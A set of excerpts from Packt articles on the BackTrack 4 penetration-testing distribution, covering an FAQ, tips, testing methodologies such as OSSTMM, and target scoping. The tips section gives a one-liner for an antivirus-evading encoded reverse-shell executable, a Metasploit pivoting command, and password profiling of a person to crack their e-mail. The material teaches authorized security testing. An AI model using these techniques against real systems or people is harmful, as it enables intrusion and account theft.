FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing
Master the art of penetration testing with BackTrack

Q: Which version of BackTrack should I choose?
A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or on third-party mirrors such as http://mirrors.rit.edu/backtrack/ or ftp://mirror.switch.ch/mirror/backtrack/, you will find BackTrack 4 in two different formats. (BackTrack 5 is now out, so you may not find version 4 on the official site, but the mirror sites above still provide it.) The first format is an ISO image file. Use this format if you want to burn BackTrack to a DVD, write it to a USB flash disk or memory card (SD, SDHC, SDXC, and so on), or install it directly to your machine. The second format is a VMware image. If you want to run BackTrack in a virtual environment, this image speeds up installation and configuration.

Q: What is Portable BackTrack?
A: You can also install BackTrack to a USB flash disk; we call this method Portable BackTrack. Once it is installed, you can boot into BackTrack from any machine with a USB port. The key advantage over the Live DVD is that you can permanently save changes to the USB flash disk; compared to a hard disk installation, this method is more portable and convenient. To create a Portable BackTrack, you can use several tools, including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com), and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for the Windows, Linux/UNIX, and Mac operating systems.

Q: How do I install BackTrack in a dual-boot environment?
A: A resource describing how to install BackTrack alongside another operating system, such as Windows XP, can be found at http://www.backtrack-linux.org/tutorials/dual-boot-install/.
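Whichever download format you choose, it is worth verifying the image against the checksum published on the mirror before burning or booting it. A minimal sketch using md5sum, with placeholder files standing in for the real ISO and its published .md5 (the file names here are invented):

```shell
# Sketch: verify a downloaded image against its checksum file before use.
# "bt4-final.iso" is a placeholder created on the spot; on a real download
# the .md5 file comes from the mirror, it is not generated locally.
echo "stand-in for the real ISO contents" > bt4-final.iso
md5sum bt4-final.iso > bt4-final.iso.md5   # normally downloaded from the mirror
md5sum -c bt4-final.iso.md5                # prints "bt4-final.iso: OK" on success
```

If the check fails, re-download the image rather than writing it to media.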
Q: What types of penetration testing tools are available in BackTrack 4?
A: BackTrack 4 comes with a number of security tools that can be used during the penetration testing process. They are categorized as follows:

Information gathering: tools to collect information about the target's DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from publicly available resources, such as the Internet, without touching the target environment.

Network mapping: tools to assess the live status of the target host, fingerprint the operating system, and probe and map applications/services through various port scanning techniques.

Vulnerability identification: tools to scan for vulnerabilities in various IT technologies, including tools to carry out manual and automated fuzz testing and to analyze the SMB and SNMP protocols.

Web application analysis: tools to assess the security of web servers and web applications.

Radio network analysis: tools to audit wireless networks, Bluetooth, and radio-frequency identification (RFID) technologies.

Penetration: tools to exploit the vulnerabilities found in the target environment.

Privilege escalation: after exploiting vulnerabilities and gaining access to the target system, tools in this category help you escalate your privileges to the highest level.

Maintaining access: tools to help you maintain access to the target machine. Note that you may need to escalate your privileges before installing any of these tools on the compromised host.

Voice over IP (VoIP): tools to analyze the security of VoIP technology.
BackTrack 4 also contains tools that can be used for:

Digital forensics: tools to perform digital forensics and investigation, such as acquiring hard disk images, carving files, and analyzing disk archives. Some practical forensic procedures require you to mount the hard drive in question in read-only mode to preserve evidence integrity.

Reverse engineering: tools to debug, decompile, and disassemble executable files.

Q: Do I have to install additional tools with BackTrack 4?
A: Although BackTrack 4 comes preloaded with many security tools, there are situations where you may need to add tools or packages because the tool is not included in the default BackTrack 4 installation, or because you want the latest version of a particular tool and it is not available in the repository. Our first suggestion is to search for the package in the software repository; you can do this with the apt-cache search command. If you find the package in the repository, use it, as this avoids installation and configuration conflicts. If you can't find it there, and you are sure the package will not cause any problems later on, you can get the software package from the author's website and install it yourself.

Q: Why do we use the WebSecurify tool?
A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in web applications. It can check for the following vulnerabilities: SQL injection, local and remote file inclusion, cross-site scripting, cross-site request forgery, information disclosure, and session security flaws. WebSecurify is readily available from the BackTrack repository.
To install it, use the apt-get command:

# apt-get install websecurify

Q: What are the types of penetration testing?
A: Black-box testing: the black-box approach is also known as external testing. While applying this approach, the security auditor assesses the network infrastructure from a remote location and is not aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, the test may reveal known and unknown sets of vulnerabilities that exist on the network.

White-box testing: the white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for the auditor to view and critically evaluate security vulnerabilities with minimum effort.

Gray-box testing: the combination of both types of penetration testing provides a powerful insight into internal and external security viewpoints. This combination is known as gray-box testing. The key benefit of devising and practicing a gray-box approach is the set of advantages posed by both approaches mentioned earlier.

Q: What is the difference between vulnerability assessment and penetration testing?
A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws on the system under consideration.
Another major difference between these two terms is that penetration testing is considerably more intrusive than vulnerability assessment, aggressively applying all the technical methods to exploit the live production environment, whereas the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is also an expensive service when compared to vulnerability assessment.

Q: Which class of vulnerability is considered the worst to resolve?
A: A design vulnerability: it requires the developer to derive the specifications from the security requirements and to address the implementation securely. Thus, it takes more time and effort to resolve than other classes of vulnerability.

Q: Which OSSTMM test type follows the rules of penetration testing?
A: Double blind testing.

Q: What is the Application Layer?
A: Layer 7 of the Open Systems Interconnection (OSI) model is known as the "Application Layer". The key function of the model is to provide a standardized way of communicating across heterogeneous networks. The model is divided into seven logical layers, namely Physical, Data Link, Network, Transport, Session, Presentation, and Application. The basic function of the application layer is to provide network services to user applications. More information can be found at http://en.wikipedia.org/wiki/OSI_model.

Q: What are the steps of the BackTrack testing methodology?
A: The illustration below shows the BackTrack testing process.
Summary
In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently.

Further resources on this subject:
Tips and Tricks on BackTrack 4 [Article]
BackTrack 4: Target Scoping [Article]
BackTrack 4: Security with Penetration Testing Methodology [Article]
Blocking Common Attacks using ModSecurity 2.5 [Article]
Telecommunications and Network Security Concepts for CISSP Exam [Article]
Preventing SQL Injection Attacks on your Joomla Websites [Article]
Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
BackTrack 4: Assuring Security by Penetration Testing
Master the art of penetration testing with BackTrack

(For more resources on this subject, see here.)

Updating the kernel
The update process is enough for keeping your software applications current. However, sometimes you may want to update your kernel, for example because the existing kernel doesn't support a new device. Remember that the kernel is the heart of the operating system, so a failed upgrade may leave your BackTrack unbootable; make a backup of your kernel and configuration first. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to BackTrack users, and updating with other kernel versions could disable those features.

Multiple customized installations
One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (a 300 MB download) after installing it from the ISO or from the VMware image provided. If you have one machine and a high-speed Internet connection, there is not much to worry about. However, imagine installing BackTrack 4 on several machines, in several locations, with a slow Internet connection. The solution is to create an ISO image with all the upgrades already installed; you can then install BackTrack 4 from the newly created ISO image without downloading the big upgrade again. For the VMware image, you can solve the problem by doing the upgrade once in the virtual image, then copying that updated image for each new VMware installation.
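The kernel-and-configuration backup advised above can be as simple as copying the relevant files out of /boot. A rough sketch, using a mock boot directory and an invented kernel version string so it runs anywhere; on a real system you would copy the files actually present in /boot itself:

```shell
# Sketch: back up the kernel image and its config before a kernel upgrade.
# "mockboot" stands in for the real /boot, and 2.6.34 is an invented
# version string; substitute the files actually present on your system.
mkdir -p mockboot kernel-backup
echo "kernel image placeholder"  > mockboot/vmlinuz-2.6.34
echo "kernel config placeholder" > mockboot/config-2.6.34
cp mockboot/vmlinuz-2.6.34 mockboot/config-2.6.34 kernel-backup/
ls kernel-backup   # both copies are now out of harm's way
```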
Efficient methodology
Combining the power of the two methodologies, the Open Source Security Testing Methodology Manual (OSSTMM) and the Information Systems Security Assessment Framework (ISSAF), provides a sufficient knowledge base to assess the security of an enterprise environment efficiently.

Can't find the dnsmap program
In our testing, the dnsmap-bulk script did not work because it could not find the dnsmap program. To fix it, you need to give the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap), edit the dnsmap-bulk.sh file using the nano text editor, and change the following:

dnsmap $i
elif [[ $# -eq 2 ]]
then
dnsmap $i -r $2

to:

./dnsmap $i
elif [[ $# -eq 2 ]]
then
./dnsmap $i -r $2

and save your changes.

fierce version
Currently, fierce version 1, included with BackTrack 4, is no longer maintained by its author (RSnake). He has suggested using fierce version 2, which is still actively maintained by Jabra. fierce version 2 is a rewrite of version 1, and it adds several new features such as virtual host detection, subdomain and extension bruteforcing, a template-based output system, and XML support for integration with Nmap. Since fierce version 2 has not been released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion checkout command:

# svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/

Make sure you are in the /pentest/enumeration directory before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.

Relationship between "vulnerability" and "exploit"
A vulnerability is a security weakness found in a system that can be used by an attacker to perform unauthorized operations, while an exploit is a piece of code (a proof of concept, or PoC) written to take advantage of that vulnerability or bug in an automated fashion.
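If you prefer not to edit the file by hand in nano, the same dnsmap-bulk.sh change can be applied with one sed substitution. The sketch below runs against a stand-in file containing only the affected lines, not the real script:

```shell
# Apply the "./dnsmap" fix described above with sed instead of nano.
# The heredoc creates a stand-in with just the affected lines; on a real
# system you would run the sed command inside /pentest/enumeration/dns/dnsmap.
cat > dnsmap-bulk.sh <<'EOF'
dnsmap $i
elif [[ $# -eq 2 ]]
then
dnsmap $i -r $2
EOF
sed -i 's|^dnsmap |./dnsmap |' dnsmap-bulk.sh   # prefix bare invocations with ./
cat dnsmap-bulk.sh
```

GNU sed's -i option edits the file in place; review the result with cat before applying this to the real script.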
Cisco privilege modes
There are 16 different privilege levels available on Cisco devices, ranging from 0 (the most restricted level) to 15 (the least restricted level). Every account created should be configured to work under a specific privilege level. More information on this is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.

Cisco Passwd Scanner
The Cisco Passwd Scanner was developed to scan a whole range of IP addresses in a specific network class. The class can be A, B, or C in network computing terms, each with its own definition of the number of hosts to be scanned. The tool is fast and efficient at handling multiple threads in a single instance. It discovers Cisco devices carrying the default Telnet password "cisco", and we have found a number of Cisco devices vulnerable to it.

Common User Passwords Profiler (CUPP)
As a professional penetration tester you may find yourself in a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials because of certain conditions: the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. It then comes down to guessing and breaking the password using password cracking techniques (the dictionary or brute-force method). CUPP is designed purely to generate a list of common passwords by profiling the target's name, birthday, nickname, family members' information, pet names, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This list serves as crucial input to the dictionary-based attack method while attempting to crack the target's e-mail account password.
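CUPP automates this profiling; as a toy sketch of the underlying idea only (this is not CUPP's actual logic, and the profile data is invented), even two profiled facts combined with a birth year already produce a small candidate list:

```shell
# Toy illustration of the profiling idea behind CUPP (not CUPP itself):
# combine invented profile facts into password candidates for a
# dictionary-based attack.
names="john rex"       # target's first name and pet's name (invented)
years="1984 84"        # birth year and its short form (invented)
for n in $names; do
  for y in $years; do
    echo "${n}${y}"    # john1984, john84, rex1984, rex84
  done
done > wordlist.txt
wc -l < wordlist.txt   # 4 candidate passwords
```

A real profile with nicknames, family names, and character mutations grows this list into the thousands, which is exactly what makes the dictionary attack viable.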
Extracting particular information from the exploits list
Using the power of bash commands, we can manipulate the output of any text file to retrieve meaningful data. Typing the following on your console will extract the list of exploit titles from files.csv:

cat files.csv | grep '"' | cut -d";" -f3

To learn the basic shell commands, refer to the online resource at http://tldp.org/LDP/abs/html/index.html.

"Inline" and "stager" payload types
An inline payload is a single, self-contained piece of shellcode that is executed with one instance of an exploit, while a stager payload creates a communication channel between the attacker and victim machines and reads off the rest of the staged shellcode to perform its specific task. It is common practice to choose stager payloads because they are much smaller than inline payloads.

Extending the attack landscape by gaining deeper access to a target network that is inaccessible from the outside
Metasploit provides the capability to view and add new routes to a destination network using the command route add targetSubnet targetSubnetMask SessionId (for example, route add 10.2.4.0 255.255.255.0 1). The SessionId points to an existing Meterpreter session (also called the gateway) created after successful exploitation, and the targetSubnet is another network address (on a dual-homed Ethernet interface) attached to the compromised host. Once Metasploit is set to route all the traffic through the compromised host's session, we are ready to penetrate further into a network that is normally not routable from our side. This technique is commonly known as pivoting or foot-holding.

Evading antivirus protection using Metasploit
Using the msfencode tool located at /pentest/exploits/framework3, we can generate a self-protected executable file with an encoded payload. This runs in parallel with the msfpayload file generation process.
The "raw" output from msfpayload is piped into msfencode, which applies a specific encoding technique before writing out the final binary. For instance, execute the following to generate an encoded version of a reverse shell executable:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe

We strongly suggest using "stager" type payloads instead of "inline" payloads, as they have a greater probability of bypassing major malware defenses due to their indefinite code signatures.

Stunnel version 3
BackTrack also comes with Stunnel version 3. The difference from Stunnel version 4 is that version 4 uses a configuration file. If you want to run version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments.

Summary
In this article we took a look at some tips and tricks to make the best use of the BackTrack OS.

Further resources on this subject:
FAQs on BackTrack 4 [Article]
BackTrack 4: Target Scoping [Article]
BackTrack 4: Security with Penetration Testing Methodology [Article]
Blocking Common Attacks using ModSecurity 2.5 [Article]
Telecommunications and Network Security Concepts for CISSP Exam [Article]
Preventing SQL Injection Attacks on your Joomla Websites [Article]
BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap, providing practical ideas and proven practices that should be handled with great care in order to assess system security correctly. Let's take a look at what this methodology looks like. It will help ensure that you are using BackTrack effectively and that your tests are thorough and reliable.

Penetration testing can be carried out independently or as part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, the Microsoft SDLC). It is vital to note that the security of a product depends not only on factors relating to the IT environment, but also on product-specific security best practices. This involves the implementation of appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. PenTesting is considered to be the last and most aggressive form of security assessment, handled by qualified professionals with or without prior knowledge of the system under examination. It can be used to assess all IT infrastructure components, including applications, network devices, operating systems, communication media, physical security, and human psychology. The output of penetration testing usually contains a report divided into several sections addressing the weaknesses found in the current state of the system, along with their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester in understanding and critically analyzing the integrity of the current defenses during each stage of the testing process.

Different types of penetration testing
Although there are different types of penetration testing, the two most general approaches that are widely accepted by the industry are black-box and white-box. These approaches will be discussed in the following sections.
Black-box testing
The black-box approach is also known as external testing. While applying this approach, the security auditor assesses the network infrastructure from a remote location and is not aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, the test may reveal known and unknown sets of vulnerabilities that exist on the network. An auditor dealing with black-box testing is also known as a black-hat.

It is important for an auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured by the threat posed by the vulnerability and the financial loss that would occur following a successful penetration. An ideal penetration tester would uncover any possible information that could lead to compromising the target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into business context.

White-box testing
The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for the auditor to view and critically evaluate security vulnerabilities with minimum effort. An auditor engaged in white-box testing is also known as a white-hat. This approach brings more value to the organization than the black-box approach, in the sense that it eliminates internal security issues lying in the target infrastructure environment, making it harder for a malicious adversary to infiltrate from the outside.
The steps involved in white-box testing are similar to those of black-box testing, except that the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate possible security issues at an early stage, before they are disclosed and exploited by intruders. The time and cost required to find and resolve the security vulnerabilities is comparably less than with the black-box approach.

The combination of both types of penetration testing provides a powerful insight into internal and external security viewpoints. This combination is known as gray-box testing, and an auditor engaged in gray-box testing is also known as a gray-hat. The key benefit of devising and practicing a gray-box approach is the set of advantages posed by both approaches mentioned earlier. However, it does require an auditor with limited knowledge of the internal system to choose the best way to assess its overall security. On the other hand, the external testing scenarios geared by the gray-box approach are similar to those of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed of and aware of the underlying technology.

Vulnerability assessment versus penetration testing
With the exponential growth of the IT security industry, there has always been great diversity in how the correct terminology for security assessment is understood and practiced. This involves commercial companies and non-commercial organizations alike, who misinterpret the terms when contracting for a specific type of security assessment. For this obvious reason, we decided to include a brief description of vulnerability assessment and to differentiate its core features from penetration testing.
Vulnerability assessment is a process of assessing internal and external security controls by identifying the threats that pose serious exposure to the organization's assets. This technical infrastructure evaluation not only points out the risks in the existing defenses but also recommends and prioritizes remediation strategies. An internal vulnerability assessment provides assurance for securing the internal systems, while an external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing processes, tools, and techniques is followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved by using an integrated vulnerability management platform that manages an up-to-date vulnerability database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management.

A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws on the system under consideration. Another major difference between the two terms is that penetration testing is considerably more intrusive than vulnerability assessment, aggressively applying all the technical methods to exploit the live production environment, whereas the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner.
This industry perception, in which the two assessment types are confused and the terms used interchangeably, is absolutely wrong. A qualified consultant always makes a point of working out the best type of assessment based on the client's business requirements, rather than misleading the client into choosing one over the other. It is also the duty of the contracting party to look into the core details of the selected security assessment program before taking any final decision. Penetration testing is an expensive service when compared to vulnerability assessment.

Security testing methodologies
Various open source methodologies have been introduced to address security assessment needs. Using these assessment methodologies, one can more easily handle the time-critical and challenging task of assessing system security, depending on the system's size and complexity. Some of these methodologies focus on the technical aspect of security testing, others focus on managerial criteria, and very few address both sides. The basic idea behind formalizing these methodologies in your assessment is to execute different types of tests step by step in order to judge the security of a system accurately.

Therefore, we introduce four well-known security assessment methodologies to provide an extended view of assessing network and application security by highlighting their key features and benefits. These are:

Open Source Security Testing Methodology Manual (OSSTMM)
Information Systems Security Assessment Framework (ISSAF)
Open Web Application Security Project (OWASP) Top Ten
Web Application Security Consortium Threat Classification (WASC-TC)

All of these testing frameworks and methodologies will assist security professionals in choosing the strategy that best fits their client's requirements and in qualifying a suitable testing prototype.
The first two provide general guidelines and methods for security testing of almost any information asset. The last two mainly deal with the assessment of the application security domain. It is, however, important to note that security in itself is an ongoing process. Any minor change in the target environment can affect the whole process of security testing and may introduce errors in the final results. Thus, before applying any of the above testing methods, the integrity of the target environment should be assured.

Additionally, adopting any single methodology does not necessarily provide a complete picture of the risk assessment process. Hence, it is left up to the security auditor to select the strategy that best addresses the target testing criteria and remains consistent with the network or application environment. Many security testing methodologies claim to be perfect at finding all security issues, but choosing the best one still requires a careful selection process, through which one can determine the accountability, cost, and effectiveness of the assessment at an optimum level. Determining the right assessment strategy thus depends on several factors, including the technical details provided about the target environment, resource availability, the PenTester's knowledge, business objectives, and regulatory concerns. From a business standpoint, investing blind capital and committing unneeded resources to a security testing process can put the whole business economy in danger.

Open Source Security Testing Methodology Manual (OSSTMM)
The OSSTMM is a recognized international standard for security testing and analysis, used by many organizations in their day-to-day assessment cycle. It is based purely on the scientific method, which assists in quantifying operational security and its cost requirements in line with business objectives.
From a technical perspective, its methodology is divided into four key groups, that is, Scope, Channel, Index, and Vector. The scope defines a process of collecting information on all assets operating in the target environment. A channel determines the type of communication and interaction with these assets, which can be physical, spectrum, and communication. All of these channels depict a unique set of security components that has to be tested and verified during the assessment period. These components comprise of physical security, human psychology, data networks, wireless communication medium, and telecommunication. The index is a method which is considerably useful while classifying these target assets corresponding to their particular identifications, such as, MAC Address, and IP Address. At the end, a vector concludes the direction by which an auditor can assess and analyze each functional asset. This whole process initiates a technical roadmap towards evaluating the target environment thoroughly and is known as Audit Scope. There are different forms of security testing which have been classified under OSSTMM methodology and their organization is presented within six standard security test types: Blind: The blind testing does not require any prior knowledge about the target system. But the target is informed before the execution of an audit scope. Ethical hacking and war gaming are examples of blind type testing. This kind of testing is also widely accepted because of its ethical vision of informing a target in advance. Double blind: In double blind testing, an auditor does not require any knowledge about the target system nor is the target informed before the test execution. Black-box auditing and penetration testing are examples of double blind testing. 
Most security assessments today are carried out using this strategy, posing a real challenge for auditors to select best-of-breed tools and techniques in order to achieve their required goal. Gray box: In gray box testing, an auditor holds limited knowledge about the target system and the target is informed before the test is executed. Vulnerability assessment is one of the basic examples of gray box testing. Double gray box: Double gray box testing works in a similar way to gray box testing, except that the time frame for the audit is defined and no channels or vectors are being tested. White-box audit is an example of double gray box testing. Tandem: In tandem testing, the auditor holds full knowledge about the target system and the target is notified in advance before the test is executed. It is worth noting that tandem testing is conducted thoroughly. Crystal box and in-house audit are examples of tandem testing. Reversal: In reversal testing, an auditor holds full knowledge about the target system and the target will never be informed of how and when the test will be conducted. Red-teaming is an example of reversal testing. Which OSSTMM test type follows the rules of penetration testing? Double blind testing. The technical assessment framework provided by the OSSTMM is flexible and capable of deriving certain test cases, which are logically divided into the five security components of the three consecutive channels mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during, and after the test, and how to interpret and correlate the final results. 
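These six test types differ along two axes: how much the auditor knows about the target beforehand, and whether the target is notified in advance. The following sketch is our own classification aid, not part of the OSSTMM itself:

```java
public class TestTypes {
    enum Knowledge { NONE, LIMITED, FULL }

    // Each OSSTMM test type paired with the auditor's prior knowledge
    // of the target and whether the target is notified beforehand.
    enum TestType {
        BLIND(Knowledge.NONE, true),
        DOUBLE_BLIND(Knowledge.NONE, false),
        GRAY_BOX(Knowledge.LIMITED, true),
        DOUBLE_GRAY_BOX(Knowledge.LIMITED, true), // audit time frame is also fixed
        TANDEM(Knowledge.FULL, true),
        REVERSAL(Knowledge.FULL, false);

        final Knowledge auditorKnowledge;
        final boolean targetNotified;

        TestType(Knowledge k, boolean notified) {
            this.auditorKnowledge = k;
            this.targetNotified = notified;
        }
    }

    public static void main(String[] args) {
        // Penetration testing follows the double blind rules:
        // no prior knowledge, and the target is not notified.
        System.out.println(TestType.DOUBLE_BLIND.targetNotified); // prints false
    }
}
```

This makes the pop-quiz answer above mechanical to check: double blind is the only type with no prior knowledge and no advance notification.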
Capturing the current state of protection of a target system by using security metrics is invaluable. Thus, the OSSTMM methodology has introduced this terminology in the form of RAV (Risk Assessment Values). The basic function of the RAV is to analyze the test results and compute the actual security value based on three factors: operational security, loss controls, and limitations. This final security value is known as the RAV score. By using the RAV score an auditor can easily extract and define milestones, based on the current security posture, to accomplish better protection. From a business perspective, the RAV can optimize the amount of investment required for security and may help in the justification of better available solutions. Key features and benefits Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides an accurate measurement of security. Its framework is adaptable to many types of security tests, such as penetration testing, white-box audit, vulnerability assessment, and so forth. It ensures that an assessment is carried out thoroughly and that the results can be aggregated in a consistent, quantifiable, and reliable manner. The methodology itself follows a process of four individually connected phases, namely the definition phase, information phase, regulatory phase, and controls test phase. Each of these phases obtains, assesses, and verifies information regarding the target environment. Evaluating security metrics can be achieved using the RAV method. The RAV calculates the actual security value based on operational security, loss controls, and limitations. The given output, known as the RAV score, represents the current state of target security. 
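The official RAV calculation is specified in the OSSTMM manual; the sketch below is a deliberately simplified illustration of the idea only — the score improves with loss controls in place and degrades with operational exposure and verified limitations — and does not reproduce the real formula or its weightings:

```java
public class RavSketch {
    // Simplified, illustrative "RAV-like" score: NOT the official OSSTMM formula.
    // opsec: exposure from visibility/access/trust; controls: loss controls in place;
    // limitations: verified weaknesses found during testing.
    static double score(double opsec, double controls, double limitations) {
        double base = 100.0; // hypothetical baseline for a fully protected target
        return base - opsec + (controls * 0.5) - limitations;
    }

    public static void main(String[] args) {
        // A hypothetical target: moderate exposure, some controls, few limitations.
        System.out.println(score(20, 10, 5)); // 80.0
    }
}
```

The takeaway is structural rather than numeric: because the three factors feed one aggregate score, an auditor can show how adding a specific loss control, or removing a verified limitation, moves the overall security posture.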
Formalizing the assessment report using the Security Test Audit Report (STAR) template can be advantageous to management as well as the technical team for reviewing the testing objectives, risk assessment values, and the output from each test phase. The methodology is regularly updated with new trends in security testing, regulations, and ethical concerns. The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislation. Additionally, a certified audit can also be eligible for accreditation from ISECOM (Institute for Security and Open Methodologies) directly.

BackTrack 4: Target scoping
Packt
15 Apr 2011
9 min read
What is target scoping? Target Scoping is defined as an empirical process for gathering target assessment requirements and characterizing each of its parameters to generate a test plan, limitations, business objectives, and time schedule. This process plays an important role in defining clear objectives for any kind of security assessment. By determining these key objectives one can easily draw a practical roadmap of what will be tested, how it should be tested, what resources will be allocated, what limitations will be applied, what business objectives will be achieved, and how the test project will be planned and scheduled. Thus, we have combined all of these elements and presented them in a formalized scope process to achieve the required goal. The following are the key concepts which will be discussed in this article: Gathering client requirements deals with accumulating information about the target environment through verbal or written communication. Preparing the test plan depends on different sets of variables. These may include shaping the actual requirements into a structured testing process, legal agreements, cost analysis, and resource allocation. Profiling test boundaries determines the limitations associated with the penetration testing assignment. These can be a limitation of technology, knowledge, or a formal restriction on the client's IT environment. Defining business objectives is a process of aligning the business view with the technical objectives of the penetration testing program. Project management and scheduling directs every other step of the penetration testing process with a proper timeline for test execution. This can be achieved by using a number of advanced project management tools. It is highly recommended to follow the scope process in order to ensure test consistency and a greater probability of success. Additionally, this process can also be adjusted according to the given situation and test factors. 
Without any such process, there will be a greater chance of failure, as the requirements gathered will have no proper definitions and procedures to follow. This can lead the whole penetration testing project into danger and may result in unexpected business interruption. Paying special attention to this stage of the penetration testing process makes an excellent contribution towards the rest of the test phases and clarifies the perspectives of both technical and management areas. The key is to acquire as much information beforehand as possible from the client to formulate a strategic path that reflects the multiple aspects of penetration testing. These may include negotiable legal terms, contractual agreement, resource allocation, test limitations, core competencies, infrastructure information, timescales, and rules of engagement. As a part of best practices, the scope process addresses each of the attributes necessary to kick-start our penetration testing project in a professional manner. As we can see in the preceding screenshot, each step constitutes unique information that is aligned in a logical order to pursue the test execution successfully. Remember, the more information that is gathered and managed properly, the easier it will be for both the client and the penetration testing consultant to further understand the process of testing. This also governs any legal matters to be resolved at an early stage. Hence, we will explain each of these steps in more detail in the following section. Gathering client requirements This step provides a generic guideline that can be drawn up in the form of a questionnaire to elicit all information about the target infrastructure from a client. A client can be any subject who is legally and commercially bound to the target organization. 
It is critical for the success of the penetration testing project to identify all internal and external stakeholders at an early stage of the project and analyze their levels of interest, expectations, importance, and influence. A strategy can then be developed for approaching each stakeholder with their requirements and involvement in the penetration testing project, to maximize positive influences and mitigate potential negative impacts. It is solely the duty of the penetration tester to verify the identity of the contracting party before taking any further steps. The basic purpose of gathering client requirements is to open a true and authentic channel by which the pentester can obtain any information that may be necessary for the testing process. Once the test requirements have been identified, they should be validated by the client in order to remove any misleading information. This will ensure that the developed test plan is consistent and complete. We have listed some of the commonly asked questions that can be used in a conventional customer requirements form and the deliverables assessment form. It is important to note that this list can be extended or shortened according to the goal of the client, and that the client must hold enough knowledge about the target environment. Customer requirements form Collect the company's information, such as company name, address, website, contact person details, e-mail address, and telephone number. What are your key objectives behind the penetration testing project? 
Determine the penetration test type (with or without specific criteria):
- Black-box testing or external testing
- White-box testing or internal testing
- Informed testing
- Uninformed testing
- Social engineering included
- Social engineering excluded
- Investigate employees' background information
- Adopt an employee's fake identity
- Denial of Service included
- Denial of Service excluded
- Penetrate business partner systems

How many servers, workstations, and network devices need to be tested?
What operating system technologies are supported by your infrastructure?
Which network devices need to be tested? Firewalls, routers, switches, modems, load balancers, IDS, IPS, or any other appliance?
Is there any disaster recovery plan in place? If yes, who is managing it?
Are there any security administrators currently managing your network?
Is there any specific requirement to comply with industry standards? If yes, please list them.
Who will be the point of contact for this project?
What is the timeline allocated for this project? In weeks or days.
What is your budget for this project?
List any other requirements as necessary.

Deliverables assessment form
What types of reports are expected?
- Executive reports
- Technical assessment reports
- Developer reports
In which format do you want the report to be delivered? PDF, HTML, or DOC.
How should the report be submitted? E-mail or printed.
Who is responsible for receiving these reports?
- Employee
- Shareholder
- Stakeholder

By using such a concise and comprehensive inquiry form, you can easily extract the customer requirements and fulfill the test plan accordingly. Preparing the test plan As the requirements have been gathered and verified by the client, it is now time to draw up a formal test plan that reflects all of these requirements, in addition to other necessary information on the legal and commercial grounds of the testing process. 
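The inquiry forms above translate naturally into a checklist structure that the testing team can validate with the client before any work begins. A minimal sketch follows; the field names and the validation rule are our own illustration, not a standard form:

```java
import java.util.ArrayList;
import java.util.List;

public class RequirementsForm {
    // Minimal model of a customer requirements form; field names are illustrative.
    String companyName;
    String contactPerson;
    String testType;            // e.g. "black-box" or "white-box"
    boolean socialEngineering;  // included or excluded from scope
    boolean denialOfService;
    int serverCount;
    int timelineWeeks;
    List<String> complianceStandards = new ArrayList<>();

    // A form is ready for client validation only once the essentials are present.
    boolean readyForValidation() {
        return companyName != null && contactPerson != null
                && testType != null && timelineWeeks > 0;
    }
}
```

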